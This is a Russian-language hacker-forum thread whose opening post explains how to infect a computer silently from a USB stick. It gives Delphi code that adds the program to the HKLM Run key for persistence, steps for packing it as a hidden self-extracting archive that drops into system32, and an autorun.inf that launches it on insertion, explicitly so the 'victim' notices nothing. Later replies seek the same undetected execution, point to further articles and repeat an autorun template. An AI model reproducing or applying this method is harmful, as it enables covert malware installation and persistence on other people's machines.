Я делаю так: 1. Сначало надо подготовить прогу) Для этого в ее коде для начало в разделе Uses добовляем модуль "registry" Затем в OnCreate формы пишем вот этот код: var reg: Tregistry; begin reg:= Tregistry.Create; reg.RootKey:= HKEY_LOCAL_MACHINE; reg.OpenKey('Software', true); reg.OpenKey('Microsoft', true); reg.OpenKey('Windows', true); reg.OpenKey('CurrentVersion', true); reg.OpenKey('Run', true); reg.WriteString('sstt', Application.ExeName); reg.CloseKey; end: Обьясню для новичков)) Данный код прописывает себя в реестре автозагрузке)) тоесть куда бы вы не поместитили прогу она сама себя запишет в авторан)) 2.Теперь перейдем не посредсвенно к запуску с флешки)) Наш цель состоит в том что бы когда флешка была подключина к порту USB она автоматически копировалась на жесткий диск) причем так что бы этого не видела жертва)) Дальше делаем следующию операцию: Нажимай правую кнопку на нашей проге, затем "добавить в архив..." Теперь надо поменять пару настроек: 1. ставим галочку напротив пункта:"Создать SFX арив 2. Потом выбираем вкладку дополнительно и нажимаем на : "Параметры SFX" 3. В "Путь для распоковки" указывем путь где вы хотите что бы располагалась ваша прога)) я указал: C:\WINDOWS\system32 4. В "Выполнить после распоковки" пишем опять же: C:\WINDOWS\system32 ,но только теперь дабовляем нашу прогу)) допустим что она называеться: "proga.exe", тогда в итоге получиться: C:\WINDOWS\system32\proga.exe 5. Далее переходим на на закладку"Режимы" и ставим галочку рядом с "Скрыть все" 6. Далее нажимаем "ок")) Осталось только сделать что бы наш архив запустилься)) для этого в корне с флешкой создаем файл "autorun.inf" это можно сделать при помощи блокнота)) Далее открываем все с помощью того же блокнота это файл и встовляем туда это: [autorun] icon=icons\drive.ico shellexecute=proga.exe Сохраняем и закрываем блокнот!) Все, подведем итог: Когда наша флешка подключаеться с USB, то запускаеться наш архив "proga.sfx.exe" благодоря: "autorun.inf" После чего наш архив распоковывает и запускает нашу прогу(причем на экране не чего не происходит) Так же при этом запуске программа прописывает себе а автозагрузке)) Все файл на компьютере и запускаеться вместе с системой)) P.S для модераторов: статья обьянясняет как запустить с флешки програму!! так что прозьба не банить!)Так как статья написана в тему, если возникнут какие нибудь проблемы прозьба сообщить мне, и я их с удовольствием исправлю!) Кому что не понятно или есть свои предложения пишите в личку!!!
djKayot, пост 19, не разобрался в своём вопросе? если можно, выложи файл... В общем меня этот вопрос крайне остро интересует, кто научит, щедро награжу))) и не принципиально, флешка, USB-хард или ещё что-то... главное USB => запуск *.exe Если метод весь из себя такой "секретный", то прошу в асю 556663224, там всё и оговорим.
тоже, что и ТС - запуск *.exe на тачке жертвы абсолютно без палева и каких-либо действий со стороны пользователя, используя исключительно доступ к USB порту, ось ХР, вероятнее всего сп 2, никакие альтернативные методы, соц инж и пр., не актуальны.
В ксакепе описывали метод запуска с помощью создания на флэшке раздела сд-диска, "флэшка-убийца" вроде статья называлась. Ссылка на pdf http://www.xakep.ru/magazine/xa/126/xa_126.pdf зы: что эта тема делает в прикрепленных? о_0
или же альтернативный вариант, не требующий спец флешки, но неуниверсальный http://flashboot.ru/index.php?name=News&op=article&sid=29 (линка из статьи, укащанной в 26 посте)
[autorun] ICON=autorun.ico OPEN=autorun.exe autorun.ico - иконка autorun.exe - файл авторана ( можно изменять на любое расш.